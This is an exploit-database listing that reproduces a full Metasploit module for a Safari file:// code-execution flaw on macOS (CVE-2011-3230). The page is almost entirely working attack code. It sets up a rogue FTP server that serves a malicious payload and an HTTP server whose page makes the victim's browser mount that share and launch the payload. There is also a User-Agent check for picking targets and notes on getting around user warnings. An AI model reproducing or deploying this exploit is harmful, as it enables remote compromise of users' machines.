[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Apple Safari file:// Arbitrary Code Execution

Author
metasploit
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16847
Category
remote exploits
Date add
16-10-2011
Platform
macOS
##
# $Id: safari_file_policy.rb 13967 2011-10-17 03:49:49Z todb $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
require 'rex/service_manager'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::FtpServer
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Apple Safari file:// Arbitrary Code Execution",
            'Description'    => %q{
                    This module exploits a vulnerability found in Apple Safari on OSX platform.
                A policy issue in the handling of file:// URLs may allow arbitrary remote code
                execution under the context of the user.
 
                    In order to trigger arbitrary remote code execution, the best way seems to
                be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or
                a fileformat that OSX might automount), and then execute it in /Volumes/[share].
                If there's some kind of bug that leaks the victim machine's current username,
                then it's also possible to execute the payload in /Users/[username]/Downloads/,
                or else bruteforce your way to getting that information.
 
                    Please note that non-java payloads (*.sh extension) might get launched by
                Xcode instead of executing it, in that case please try the Java ones instead.
            },
            'License'        => MSF_LICENSE,
            'Version'        => "$Revision: 13967 $",
            'Author'         =>
                [
                    'Aaron Sigel',  # Initial discovery
                    'sinn3r',       # Metasploit (also big thanks to HD, and bannedit)
                ],
            'References'     =>
                [
                    ['CVE', '2011-3230'],
                    ['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
                    ['URL', 'http://support.apple.com/kb/HT5000']
                ],
            'Payload'        =>
                {
                    'BadChars'    => "",
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none",
                },
            'Platform'       => [ 'unix', 'osx', 'java' ],
            'Arch'           => [ ARCH_CMD, ARCH_JAVA ],
            'Targets'        =>
                [
                    [ 'Safari 5.1 on OSX',           {} ],
                    [ 'Safari 5.1 on OSX with Java', {} ]
                ],
            'Privileged'     => true,
            'DisclosureDate' => "Oct 12 2011",  #Blog date
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
                OptPort.new('SRVPORT',   [true, "The local port to use for the FTP server (Do not change)", 21 ]),
                OptPort.new('HTTPPORT',  [true, "The HTTP server port", 80])
            ], self.class )
    end
 
 
    #
    # Start the FTP aand HTTP server
    #
    def exploit
        # The correct extension name is necessary because that's how the LauncherServices
        # determines how to open the file.
        ext = (target.name =~ /java/i) ? '.jar' : '.sh'
        @payload_name = Rex::Text.rand_text_alpha(4 + rand(16)) + ext
 
        # Start the FTP server
        start_service()
        print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}")
 
        # Create our own HTTP server
        # We will stay in this functino until we manually terminate execution
        start_http()
    end
 
 
    #
    # Lookup the right address for the client
    #
    def lookup_lhost(c=nil)
        # Get the source address
        if datastore['SRVHOST'] == '0.0.0.0'
            Rex::Socket.source_address( c || '50.50.50.50')
        else
            datastore['SRVHOST']
        end
    end
 
 
    #
    # Override the client connection method and
    # initialize our payload
    #
    def on_client_connect(c)
        r = super(c)
        @state[c][:payload] = regenerate_payload(c).encoded
        r
    end
 
 
    #
    # Handle FTP LIST request (send back the directory listing)
    #
    def on_client_command_list(c, arg)
        conn = establish_data_connection(c)
        if not conn
            c.put("425 Can't build data connection\r\n")
            return
        end
 
        print_status("Data connection setup")
        c.put("150 Here comes the directory listing\r\n")
 
        print_status("Sending directory list via data connection")
        month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
        m = month_names[Time.now.month-1]
        d = Time.now.day
        y = Time.now.year
 
        dir = "-rwxr-xr-x 1 ftp ftp              #{@state[c][:payload].length.to_s} #{m} #{d}  #{y} #{@payload_name}\r\n"
        conn.put(dir)
        conn.close
 
        print_status("Directory sent ok")
        c.put("226 Transfer ok\r\n")
 
        return
    end
 
 
    #
    # Handle the FTP RETR request. This is where we transfer our actual malicious payload
    #
    def on_client_command_retr(c, arg)
        conn = establish_data_connection(c)
        if not conn
            c.put("425 can't build data connection\r\n")
            return
        end
 
        print_status("Connection for file transfer accepted")
        c.put("150 Connection accepted\r\n")
 
        # Send out payload
        conn.put(@state[c][:payload])
        conn.close
        return
    end
 
 
    #
    # Handle the HTTP request and return a response.  Code borrorwed from:
    # msf/core/exploit/http/server.rb
    #
    def start_http(opts={})
        # Ensture all dependencies are present before initializing HTTP
        use_zlib
 
        comm = datastore['ListenerComm']
        if (comm.to_s == "local")
            comm = ::Rex::Socket::Comm::Local
        else
            comm = nil
        end
 
        # Default the server host / port
        opts = {
            'ServerHost' => datastore['SRVHOST'],
            'ServerPort' => datastore['HTTPPORT'],
            'Comm'       => comm
        }.update(opts)
 
        # Start a new HTTP server
        @http_service = Rex::ServiceManager.start(
            Rex::Proto::Http::Server,
            opts['ServerPort'].to_i,
            opts['ServerHost'],
            datastore['SSL'],
            {
                'Msf'        => framework,
                'MsfExploit' => self,
            },
            opts['Comm'],
            datastore['SSLCert']
        )
 
        @http_service.server_name = datastore['HTTP::server_name']
 
        # Default the procedure of the URI to on_request_uri if one isn't
        # provided.
        uopts = {
            'Proc' => Proc.new { |cli, req|
                    on_request_uri(cli, req)
                },
            'Path' => resource_uri
        }.update(opts['Uri'] || {})
 
        proto = (datastore["SSL"] ? "https" : "http")
        print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
 
        if (opts['ServerHost'] == '0.0.0.0')
            print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
        end
 
        # Add path to resource
        @service_path = uopts['Path']
        @http_service.add_resource(uopts['Path'], uopts)
 
        # As long as we have the http_service object, we will keep the ftp server alive
        while @http_service
            select(nil, nil, nil, 1)
        end
    end
 
 
    #
    # Kill HTTP/FTP (shut them down and clear resources)
    #
    def cleanup
        super
 
        # Kill FTP
        stop_service()
 
        # clear my resource, deregister ref, stop/close the HTTP socket
        begin
            @http_service.remove_resource(datastore['URIPATH'])
            @http_service.deref
            @http_service.stop
            @http_service.close
            @http_service = nil
        rescue
        end
    end
 
 
    #
    # Ensures that gzip can be used.  If not, an exception is generated.  The
    # exception is only raised if the DisableGzip advanced option has not been
    # set.
    #
    def use_zlib
        if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
            raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set.  Don't do that!"
        end
    end
 
 
    #
    # Returns the configured (or random, if not configured) URI path
    #
    def resource_uri
        path = datastore['URIPATH'] || random_uri
        path = '/' + path if path !~ /^\//
        datastore['URIPATH'] = path
        return path
    end
 
 
    #
    # Handle HTTP requets and responses
    #
    def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
 
        if agent !~ /Macintosh; Intel Mac OS X/ or agent !~ /Version\/5\.\d Safari\/(\d+)\.(\d+)/
            print_error("Unsupported target: #{agent}")
            send_response(cli, 404, "Not Found", "<h1>404 - Not Found</h1>")
            return
        end
 
        html = <<-HTML
        <html>
        <head>
        <base href="file://">
        <script>
        function launch() {
            document.location = "/Volumes/#{lookup_lhost}/#{@payload_name}";
        }
 
        function share() {
            document.location = "ftp://anonymous:anonymous@#{lookup_lhost}/";
            setTimeout("launch()", 2000);
        }
 
        share();
        </script>
        </head>
        <body>
        </body>
        </html>
        HTML
 
        send_response(cli, 200, 'OK', html)
    end
 
 
    #
    # Create an HTTP response and then send it
    #
    def send_response(cli, code, message='OK', html='')
        proto = Rex::Proto::Http::DefaultProtocol
        res = Rex::Proto::Http::Response.new(code, message, proto)
        res['Content-Type'] = 'text/html'
        res.body = html
 
        cli.send_response(res)
    end
 
end
 
=begin
- Need to find a suitable payload that can be executed without warning.
  Certain executables cannot be executed due to permission issues. A jar file doesn't have this
  problem, but we still get a "Are you sure?" warning before it can be executed.
- Allow user-specified port to automount the share
- Allow ftp USERNAME/PASSWORD (optional)
=end



#  0day.today [2024-11-14]  #